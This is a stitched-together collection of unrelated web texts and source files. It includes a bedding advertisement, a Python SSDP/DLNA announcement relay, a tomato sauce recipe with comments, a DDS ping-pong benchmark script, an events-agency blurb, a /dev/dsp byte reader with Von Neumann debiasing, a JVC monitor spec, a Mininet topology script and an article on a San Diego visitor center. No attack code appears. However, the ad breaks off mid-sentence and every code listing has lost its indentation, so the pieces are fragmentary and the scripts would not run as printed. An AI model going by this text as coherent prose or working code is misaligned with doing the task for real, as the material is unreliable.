Just imagine the luxury of coming home after a long day from work amid the Metro Manila traffic. When in contact, you slowly give in to your bed’s playful call to slumber. Your eyes grow heavy as you drag your tired body, anticipating the warm caress of your duvet cover wrapping you up in its cocoon of comfort. Slowly, the thoughts of the exhausting work day drift off while you climb the peak of relaxation. Hours pass as if they were seconds and you wake up the next day feeling very refreshed, ready to start the day but not really keen on leaving the comfort of your bed. You sit up, smile and think of how the time you spent shopping for bedding was all worth it.
coziness of a blanket. The right combination makes for the most comfortable slumber.
So what brand defines the perfect sheet set?
products have been carefully selected to provide the perfect experience of going above and even beyond a superb lifestyle.
consumers. Carefully selected only the finest products to give your home a touch of unique sophistication and class. The new collection includes vigorous and youthful designs as well as brand new colors for its Lifestyle Urban Premium, Urban Basic, and Pick n’ Go collections, all designed to guarantee the highest quality of comfort.
In the previous year, Canadian Manufacturing’s products have undergone an upgrade with its fabric starting with the Lifestyle Urban Premium line which went from a 220-thread count to 300-thread 100% cotton. The Urban Basic Collection also upgraded to a 180-thread count cotton rich blend coming from its previous 150-thread count and Lifestyle Pick n’ Go collection continues to provide budget conscious consumers a wide variety of playful and lively bed sheet designs and comfort. With wide range of prints and hues to choose from, Modern Linen, another brand extension of Lifestyle, can suit the most affordable needs of every budget conscious consumer. Modern Linen offers a collection of microfiber plain sheets sets as well as printed designs. Another collection to look forward to this year are Canadian’s wide assortment of white fabric.
Canadian Bed & Bath started to cater to the hospitality industry back in 2003 and slowly expanded its products and services for not only hotels and resorts, but hospitals, spas and restaurants as well. Until today their series of white sheets, towels, pillows, table linens and bed accessories remains to be world class quality. Lifestyle Bed Linens also brings you only the finest towels for everyday use.In its campaign to promote only the highest quality products, Lifestyle Towels aims to provide the market with excellent, pure cotton products while remaining environmentally responsible. In doing so, CCI acquired cotton from all over the world to provide a taste bud for anyone. Highlighting this year’s collection are Brazilian Cotton, USA Cotton and Cotton Made in Africa.
Brazilian cotton ensures a unique drying experience with its soft, contamination free, super-absorbent material crafted with a unique beveled design.
USA Cotton has been proclaimed one of the best cottons in the world, grown with the highest quality standards to provide a clean, contamination free towel. Organic 100% combed cotton is grown in strictly controlled environments to produce the purest natural cotton.
Lifestyle by Canadian is available at major department stores nationwide. For more details and collections, visit their website www.canadianbeddings.com.
For promotions and updates, like their Facebook page “Lifestyle Bed Linens”. |
#!/usr/bin/python
# Copyright (C) 2014 Graham R. Cobb
# Released under GPL V2 -- see LICENSE
# Python multicast code taken from Stack Overflow (https://stackoverflow.com/questions/603852/multicast-in-python/1794373#1794373) by tolomea (https://stackoverflow.com/users/10471/tolomea) under CC BY-SA 3.0
# Other example code taken from Stack Overflow by Toddeman (under CC BY-SA 3.0), however it does not seem to be available any longer
import socket
import struct
import time
import select
import re
from optparse import OptionParser
VERSION='0.3'
DLNA_GRP = '239.255.255.250'
DLNA_PORT = 1900
MCAST_IF = '127.0.0.1'
CRLF = "\015\012"
#SERVER='192.168.0.238'
SERVER=''
UUID=''
URL=''
INTERVAL = 180
parser = OptionParser(usage="usage: %prog [options] server\n %prog --listen-only",
epilog="Server can be specified as hostname or IP address and should be omitted if --listen-only is used",
version="%prog "+VERSION)
parser.add_option("-a", "--all",
action="store_true", dest="allif", default=False,
help="send announcements to all interfaces, not just the loopback interface")
parser.add_option("-i", "--interval", type="int", dest="interval", default=INTERVAL,
help="seconds between notification updates (default %default)")
parser.add_option("-l", "--listen-only",
action="store_true", dest="listen", default=False,
help="just listen and display messages seen, do not contact a server or send announcements")
(options, args) = parser.parse_args()
LISTEN=options.listen
if len(args) == 0 and not LISTEN:
parser.error("server must be specified (hostname or IP address)")
if len(args) > 1:
parser.error("incorrect number of arguments")
if not LISTEN:
SERVER=args[0]
INTERVAL=options.interval
osock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
osock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 4)
osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
if not options.allif:
mreq = struct.pack("4sl", socket.inet_aton(MCAST_IF), socket.INADDR_ANY)
osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, mreq)
imsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
imsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
imsock.bind(('', DLNA_PORT))
mreq = struct.pack("4sl", socket.inet_aton(DLNA_GRP), socket.INADDR_ANY)
imsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def notify(addr, port):
if (URL != '' and UUID != '' and not LISTEN):
# Note: responses should have ST:, notifies should have NT:
# We include both
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: urn:schemas-upnp-org:device:MediaServer:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:device:MediaServer:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: upnp:rootdevice' + CRLF \
+ 'USN: uuid:' + UUID + '::upnp:rootdevice' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: uuid:' + UUID + CRLF \
+ 'USN: uuid:' + UUID + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: urn:schemas-upnp-org:service:ContentDirectory:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:ContentDirectory:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: urn:schemas-upnp-org:service:ConnectionManager:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:ConnectionManager:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: urn:schemas-upnp-org:service:X_MS_MediaReceiverRegistrar:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:X_MS_MediaReceiverRegistrar:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
else:
print "Skipping notification"
def respond(addr, port):
if (URL != '' and UUID != '' and not LISTEN):
# Note: responses should have ST:, notifies should have NT:
# We include both
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: urn:schemas-upnp-org:device:MediaServer:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:device:MediaServer:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: upnp:rootdevice' + CRLF \
+ 'USN: uuid:' + UUID + '::upnp:rootdevice' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: uuid:' + UUID + CRLF \
+ 'USN: uuid:' + UUID + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: urn:schemas-upnp-org:service:ContentDirectory:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:ContentDirectory:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: urn:schemas-upnp-org:service:ConnectionManager:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:ConnectionManager:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: urn:schemas-upnp-org:service:X_MS_MediaReceiverRegistrar:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:X_MS_MediaReceiverRegistrar:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
else:
print "Skipping response"
def server():
if not LISTEN:
msg = ('M-SEARCH * HTTP/1.1' + CRLF \
+ 'Host: %s:%d' + CRLF \
+ 'Man: "ssdp:discover"' + CRLF \
+ 'ST: upnp:rootdevice' + CRLF \
+ 'MX: 3' + CRLF \
+ 'User-Agent:ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ CRLF) % (SERVER, DLNA_PORT)
print "Sending to server: \n" + msg
osock.sendto(msg, (SERVER, DLNA_PORT))
def parse_msg(msg):
global URL, UUID, last_update, next_notification
if (re.match('^HTTP/1.1\s*200\s*OK', msg, re.IGNORECASE)):
# Response to our M-SEARCH
match = re.search(r'^LOCATION:\s*(.*)\r$', msg, re.IGNORECASE | re.MULTILINE)
if match:
URL = match.group(1)
match = re.search(r'^USN:\s*uuid:([^:]+):', msg, re.IGNORECASE | re.MULTILINE)
if match:
UUID = match.group(1)
print 'URL=%s, UUID=%s.' % (URL, UUID)
last_update = time.time()
# Bring the notifcation forward
next_notification = time.time() + 1
def is_search(msg):
return re.match('^M-SEARCH', msg, re.IGNORECASE)
# Get info from server
last_update = 0
server()
next_notification = time.time() + INTERVAL
# Note: the port is not set up until at least one send has happened
(notused, oport) = osock.getsockname()
isock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
isock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
isock.bind(('', oport))
while True:
(readyin, notused, notused) = select.select([isock, imsock], [], [], max(next_notification - time.time(),0))
if (isock in readyin):
(msg, (addr, port)) = isock.recvfrom(4096)
print "Received unicast from %s:%d\n%s" % (addr, port, msg)
if (is_search(msg)):
respond(addr, port)
else:
parse_msg(msg)
if (imsock in readyin):
(msg, (addr, port)) = imsock.recvfrom(4096)
if (port == oport):
print "Ignored multicast from ourselves (%s:%d)" % (addr, port)
else:
print "Received multicast from %s:%d\n%s" % (addr, port, msg)
if (is_search(msg)):
respond(addr, port)
if (time.time() >= next_notification):
next_notification = time.time() + INTERVAL
# Has the server info been updated recently?
if (time.time() - last_update <= INTERVAL):
# Yes, just do the notification
notify(DLNA_GRP, DLNA_PORT)
else:
# Get new info from the server
server()
|
Here is my simple tomato sauce recipe, works perfectly with pasta dishes or when thickened can be used as a pizza sauce.
Blend the tomatoes, capsicum, chilli, onion and carrot with a bit of water until smooth. Heat a the oil in a pan, then add the garlic paste, followed by the tomato paste.
Once that's cooked for a couple of minutes, add the blended mixture and simmer. Add salt and sugar followed by a bit of tandoori masala or cumin powder or oregano or you can just leave it plain and unspiced according to your taste.
Let it simmer until thick and all the water is gone. Taste and adjust if needed. Then use accordingly!
aslm fauzia, how long can I keep this sauce in the fridge?
W/Salaam, the sauce keeps well for about 4 days in the fridge but up to a month if frozen.
i would like to ask one thing ... after adding the garlic paste into the pan we directly add the blender mixture or something else first added into it.
W/Salaam, as mentioned in the recipe...first oil goes in the pan, then garlic, then tomato paste and THEN the blended mixture.
Made ur baked naan ,it was gorgeous ,love it ,thank u for the recipe .in myanmar we don't get naan ,my all family members conveying u regards .
Assalam-0-Allaikum Fauzia...approximately how many pizzas we can make with this quantity (12 inches pizzas)???
ur recepies r really excellent i try many of them really yumyyyyyyyyyyyyyyyyyy.i want to ask pizza baking in microwave oven take how much time?
Hi! Thanks, although I never bake or cook anything in my microwave so cannot know how long it would take to bake in that.
I am from Maldives. I have tried some of your dishes and all my family members really like the tastes of it. Its really yummy. Our best regards and well wishes from all of us.
Is it ok if I omit capsicum in the sauce & the chicken filling, as it is not easily available at my place?
how to make tomato paste ??
WAAAOW. Very easy, I vl try it when I want to bake pizza. Madam g, u r great.
I m 4m Muzaffarabad. Azad Kashmir.
hi ur recipes r really good i like them & tried toooooooooooo,plz add pakistani simple dishes tooooo.
Salam. Used this recipe for pasta twice. Tastes really good. People usually can't believe it blended in it carrots and capsicum. Hehe. Ingenius in deed! JazakumAllah Khayr Sister Fauzia!
Can i make tomato paste by blending a peeled tomato?
Blend and then cook it down until it is very thick and concentrated. Then that will be tomato paste.
make n add tomato pure with that same process??
Tomato puree/paste is different and more concentrated than just blending tomatoes. It helps thicken and enrich the mixture. |
import utils, os, sys, csv, subprocess, time, optparse, pdb
def pingpong(o):
texec = []
ping = 'ping'
pong = 'pong'
if sys.platform == 'win32':
ping = 'ping.exe'
pong = 'pong.exe'
apiselect=0
if o.capi:
#C
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + pong)
texec[apiselect].append('C')
apiselect+=1
if o.cppapi:
#SACPP
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + pong)
texec[apiselect].append('SACPP')
apiselect+=1
if o.isoapi:
#ISOCPP
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + pong)
texec[apiselect].append('ISOCPP')
apiselect+=1
''' Create or append to total averages file '''
tafcsv = utils.getCSV(o.averagesfile)
#Create nested dictionary
results = utils.tree()
for i in texec:
resultsApi = results[i[2]]
#1KB
Bsize = 1000
try:
if o.pongonly:
pong = subprocess.Popen([i[1]],stdout=subprocess.PIPE, stderr=subprocess.PIPE)
utils.setPriority(pong.pid, o.pongnice, o.pongaffinity)
if o.pongonly and not o.pingonly:
#Run for 10 minutes and exit program
time.sleep(600)
sys.exit(0)
time.sleep(1)
''' Set the CSV output file (af) '''
csvfile = i[0] + ".csv"
cw = utils.getCSV(csvfile)
cw.writerow([str(time.strftime("%x %H:%M:%S"))])
try:
while(Bsize <= (o.maxpayload * 1000)):
resultsBsize = resultsApi[int(Bsize)]
print "launching " + i[0] + "with args:" + str(Bsize) + " " + str(o.samples) + " " + str(o.seconds)
cw.writerow([str(Bsize/1000)+"KB"])
cw.writerow(['Seconds'] + ['RT Count'] + ['RT median'] + ['RT min'] +
['W Count'] + ['W median'] + ['W min'] +
['R Count'] + ['R mean'] + ['R min']);
try:
if o.pingonly:
ping = subprocess.Popen( [i[0], str(Bsize), str(o.samples), str(o.seconds) ],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
utils.setPriority(ping.pid, o.pingnice, o.pingaffinity)
except OSError:
print "Cannot find ping executable: " + str([i[0]])
#Wait for ping to terminate
ping.wait()
for line in ping.stderr:
print 'err: ' + line
for line in ping.stdout:
utils.parseRT(line,resultsBsize)
for key in sorted(resultsBsize):
k = resultsBsize[key]
cw.writerow([key] +
[k['RoundTrip']['Count']] + [k['RoundTrip']['Median']] + [k['RoundTrip']['Min']] +
[k['Read']['Count']] + [k['Read']['Median']] + [k['Read']['Min']] +
[k['Write']['Count']] + [k['Write']['Median']] + [k['Write']['Min']])
Bsize = Bsize*2
except OSError:
print "Cannot find ping executable: " + [i[0]]
finally:
if o.pongonly:
#Quit pong
pingq = subprocess.Popen( [i[0], 'quit' ], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pingq.wait()
for line in zip(pingq.stdout, pingq.stderr):
print line
pong.terminate()
except OSError:
print "Cannot find pong executable: " + str([i[1]])
tafcsv.writerow([str(time.strftime("%x %H:%M:%S"))])
tafcsv.writerow(['Payload KB'] + ['RoundTrip C'] + ['RoundTrip SACPP'] + ['RoundTip ISOCPP']
+ ['Read C'] + ['Read SACPP'] + ['Read ISOCPP']
+ ['Write C'] + ['Write SACPP'] + ['Write ISOCPP'])
Bsize = 1000
while Bsize <= (o.maxpayload * 1000):
KB = Bsize/1000
#pdb.set_trace()
tafcsv.writerow([KB] + utils.is_empty(results['C'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['C'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['C'][Bsize]['Overall']['Write']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['Write']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Write']['Median']))
Bsize = Bsize*2
def main():
parser = optparse.OptionParser()
parser.add_option("-C", "--capi", dest="capi",
help="Run C API Roundtrip",
action="store_true",
default=False)
parser.add_option("-S", "--sacppapi", dest="cppapi",
help="Run SACPP API Roundtrip",
action="store_true",
default=False)
parser.add_option("-I", "--isocppapi", dest="isoapi",
help="Run ISOCPP API Roundtrip",
action="store_true",
default=False)
parser.add_option("-o", "--output", dest="averagesfile",
help=("Optional path and filename for a overall average payload and API size by"
"default this is stored in the current working directory"),
default="averages.csv")
parser.add_option("", "--pingonly", dest="pingonly",
help="Only create the ping daemon",
action="store_true",
default=False)
parser.add_option("", "--pongonly", dest="pongonly",
help="Only create the pong daemon",
action="store_true",
default=False)
pingopt = optparse.OptionGroup(parser, "Ping options",
"Change arguments for ping, run time in seconds, number of samples and maxpayload")
pingopt.add_option("", "--seconds", type="int", dest="seconds",
help="The number of seconds ping should execute for, the default is 10",
default=10)
pingopt.add_option("", "--samples", type="int", dest="samples",
help="The number of samples ping should send, the default is infinite",
default=0)
pingopt.add_option("", "--maxpayload", type="int", dest="maxpayload",
help="The max payload in kB, the default is 64",
default=64)
parser.add_option_group(pingopt)
cpuopt = optparse.OptionGroup(parser, "CPU and priority options",
"Allow the setting of NICE and CPU affinity")
cpuopt.add_option("", "--pingaffinity", type="int", dest="pingaffinity",
help="Set the CPU affinity for the ping process, the default is cpu 1",
default=1)
cpuopt.add_option("", "--pongaffinity", type="int", dest="pongaffinity",
help="Set the CPU affinity for the pong process, the default is cpu 0",
default=0)
cpuopt.add_option("", "--pingnice", type="int", dest="pingnice",
help="Set the nice value for the ping process, the default is -20. NOTE: This option is available on Linux only, Windows will run under REALTIME_PRIORITY_CLASS",
default=-20)
cpuopt.add_option("", "--pongnice", type="int", dest="pongnice",
help="Set the nice value for the pong process, the default is -20. NOTE: This option is available on Linux only, Windows will run under REALTIME_PRIORITY_CLASS",
default=-20)
parser.add_option_group(cpuopt)
(options, args) = parser.parse_args()
if(not options.capi and not options.cppapi and not options.isoapi):
#Nothing was set, run them all
options.capi = True
options.cppapi = True
options.isoapi = True
if not options.pingonly and not options.pongonly:
#Ping and pong (default)
options.pingonly = True
options.pongonly = True
pingpong(options)
if __name__ == "__main__":
main()
|
BML International-UK was founded in 1994 with a simple aim to represent its clients and to find the best match for their different and varied M.I.C.E. needs.
Our service is global and we can source your next destination, venue and hotel based on your specific budget and criteria.
Whether you wish to organise an incentive programme, a product launch, a sales and marketing meeting, a conference, a convention, or an exhibition, etc, we are here to help you.
Recommend the best venue, while considering; cost, services required, suitability of conference/meeting rooms, type of accommodation required and other related facilities needed.
Arrange inspection visits for clients or we will attend on your behalf.
Build a close relationship with you, our client, to ensure a successful and smooth running event.
Research and organise pre and post event activities/tours, etc.
Above all, BML International-UK offers services enabling you to make the right decision for your important event. |
#! ../environment/bin/python3.3
import argparse
import tempfile
import os
from itertools import tee
from binascii import hexlify
def main():
parser = argparse.ArgumentParser(description = 'Reads binary data from a file')
parser.add_argument('-f, --file',
type = str,
default = '/dev/dsp',
help = 'Specifies file to read.',
dest = 'datasource')
parser.add_argument('-b, --bytesize',
type = int,
default = None,
help = 'Specifies number of bytes to read.',
dest = 'bytesize')
parser.add_argument('-d, --debias',
default = False,
const = True,
action = 'store_const',
help = 'Uses Von Neumann algorithm to balance numbers of 1s and 0s',
dest = 'debias')
parser.add_argument('-t, --temp',
default = '/tmp',
help = 'Give a prefix destination for storing temporary files',
dest = 'temp')
opts = parser.parse_args()
BitSource = DataStream(opts.datasource)
print(BitSource.getBinary(opts.bytesize, opts.debias, opts.temp))
def VNdebias(binary, temp):
debfile = tempfile.TemporaryFile(mode='a+', prefix = temp)
while True:
bits = binary.read(2)
try:
if bits[0] != bits[1]:
debfile.write(bits[1])
except(IndexError):
break
debfile.seek(0)
return debfile.read()
class DataStream:
def __init__(self, datasource):
self.datasource = datasource
def getBytes(self, bytesize):
with open(self.datasource,'rb') as bitSource:
return bitSource.read(bytesize)
def getInts(self, bytesize):
sourcebytes = self.getBytes(bytesize)
return sourcebytes
def getBinary(self, bytesize, debias, temp):
binfile = tempfile.TemporaryFile(mode='w+', prefix=temp)
for bit in self.getInts(bytesize):
binfile.write(format(bit,'08b'))
binfile.seek(0)
if debias == False:
return binfile.read()
else:
return VNdebias(binfile, temp)
if __name__ == "__main__":
main()
|
Description : Designed to compliment our new Super LoLux HD range of security cameras the GM-W192 is a 18.5-inch widescreen, WXGA resolution (1366 x 768 pixel), LCD monitor perfect for 24/7 operation. Combining the best new technologies such as LED backlighting, with improved performance, reduced energy use and JVC's great build quality the GD-W192 is the ideal choice for any modern security situation.
GD-W192: 1366 x 768 pixel WXGA resolution, anti-glare screen.
3D Comb Filter helps to reduce composite video processing artifacts.
LED Backlight enables mercury- free, low power consumption operation. |
#!/usr/bin/python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
# Topology with two switches and two hosts (static macs, no loops, no STP)
#
# 172.16.10.0/24
# h1 ------------------- sw1 ------------------ sw2------- -------------h2
# .1 .2
##############################################################################
from mininet.net import Mininet, VERSION
from mininet.log import setLogLevel, info
from mininet.cli import CLI
from distutils.version import StrictVersion
from p4_mininet import P4DockerSwitch
def main():
net = Mininet( controller = None )
# add hosts
h1 = net.addHost( 'h1', ip = '172.16.10.1/24' )
h2 = net.addHost( 'h2', ip = '172.16.10.2/24' )
# add switch 1
sw1 = net.addSwitch( 'sw1', target_name = "p4dockerswitch",
cls = P4DockerSwitch, config_fs = 'configs/sw1/l2',
pcap_dump = True )
# add switch 2
sw2 = net.addSwitch( 'sw2', target_name = "p4dockerswitch",
cls = P4DockerSwitch, config_fs = 'configs/sw2/l2',
pcap_dump = True )
# add links
if StrictVersion(VERSION) <= StrictVersion('2.2.0') :
net.addLink( sw1, h1, port1 = 1 )
net.addLink( sw1, sw2, port1 = 2, port2 = 2 )
net.addLink( sw2, h2, port1 = 1 )
else:
net.addLink( sw1, h1, port1 = 1, fast=False )
net.addLink( sw1, sw2, port1 = 2, port2 = 2, fast=False )
net.addLink( sw2, h2, port1 = 1, fast=False )
net.start()
CLI( net )
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
main()
|
SAN DIEGO – Six years after purchasing the aging Mission Valley Resort on Hotel Circle South, demolition of the former resort is complete, and the Morris Cerullo Legacy International Center is moving from the past into its future.
Designed by the renowned San Diego architect Gordon Carrier and his Carrier Johnson team, and being constructed by Clark Construction (builder of Petco Park and the Naval Hospital at Camp Pendleton), grading has already begun at the site. Retaining walls are under construction and underground sewer and storm drain lines are being installed. Due to open in November 2019, the Legacy Center will bring a world-class resort hotel and a cutting-edge, technologically advanced visitor experience to San Diego.
This “Destination with a Destiny” resort is expected to attract visitors from across the region, the United States, and from around the world, where Dr. Morris Cerullo, the center’s patron, has spent his life ministering face to face to over 5 million people.
The Welcome Center will feature a 30-foot diameter interactive globe of the world, offering information on cities, countries, and cultures through dozens of touch screen panels. Rock-wall-lined Roman catacombs will transport the visitor back 2,000 years to ancient cultures.
The centerpiece of the Welcome Center is the 100-seat, full-motion-seat History Dome Theater, which will feature films produced by Disney alumni, Visioneering. In “Wings over Israel” a visitor will soar above the tree tops, coastline, and historic sites of Israel—from the Sea of Galilee, Masada, the Jordan River, and Jerusalem, in a breathtaking experience.
Also featured is “Walk through the Bible,” a thrilling 4-dimensional journey through the Bible from Genesis to Jesus Christ. The theatre is equipped with motion seats, wind, fog, light strobes, and scents, to fully immerse the visitor in a complete experience.
The 127-room, luxurious Legacy Resort Hotel, replete with a world-class restaurant, “Theresa’s,” a spa, and full fitness facilities, will be open to the public. “The Patio” restaurant will provide a more casual dining experience, and catering services that will allow visiting groups and the community to hold receptions and special events.
The project also has a replica of Jerusalem’s Western Wall that stands 16 feet high and 110 feet long. The wall is to be made out of stone imported from Jerusalem.
An indoor-outdoor marketplace, selling goods from around the world, will be located near the Wailing Wall replica, in which visitors can feel like they are shopping in another part of the world.
The Pavilion will feature a 500-seat theatre, capable of live-stage productions and first-run film showings, along with a learning and conference center.
